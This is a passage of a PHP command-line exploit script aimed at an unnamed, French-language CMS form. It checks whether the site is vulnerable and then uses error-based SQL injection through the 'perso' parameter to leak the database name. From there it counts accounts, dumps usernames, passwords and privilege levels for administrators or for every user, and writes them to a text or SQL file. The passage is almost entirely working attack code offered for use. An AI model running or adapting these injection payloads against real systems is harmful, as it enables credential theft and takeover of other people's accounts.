\n"; print "\nExample....: php $argv[0] localhost 80 / 1 txt "; print "\nExample....: php $argv[0] localhost 80 /site/ 3 sql \n"; die(); } $host = $argv[1]; $port = $argv[2]; $path = $argv[3]; $mode = $argv[4]; $file = $argv[5]; if($file == "txt") $file = "accounts.txt"; else $file = "accounts.sql"; $inj_test = "or '1'='1"; $inj_db = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_test.""; if(!(preg_match("#Erreur SQL#", postit($host,$port, $path,$payload)))) die ("[-] CMS not vulnerable\n"); else print ("[+] CMS can be exploited!\n"); $payload = "send=Envoyer&perso=test".$inj_db.""; $db = fetch_data(PostIt($host,$port,$path,$payload)); if(empty($db)) die("[-] Can't found the database!\n"); print "[+] Database: ".$db."\n"; switch ($mode) { case 1: $inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_count_accounts.""; $num = fetch_data(PostIt($host,$port,$path,$payload)); print "[+] Admin accounts: ".$num."\n"; for($i=0; $i<$num; $i++) { $inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_accounts.""; $data = fetch_data(PostIt($host,$port,$path,$payload)); list($account, $pass, $level) = split('[/.-]', $data); print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n"; if($file == "accounts.txt") write_txt($file, $account, $pass, $level); else write_sql($file, $account, $pass, $level); } break; case 2: $inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_count_accounts.""; $num = fetch_data(PostIt($host,$port,$path,$payload)); print "[+] Accounts: ".$num."\n"; for($i=0; $i<$num; $i++) { $inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1"; $payload = "send=Envoyer&perso=test".$inj_accounts.""; $data = fetch_data(PostIt($host,$port,$path,$payload)); list($account, $pass, $level) = split('[/.-]', $data); print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n"; if($file == "accounts.txt") write_txt($file, $account, $pass, $level); else write_sql($file, $account, $pass, $level); } break; }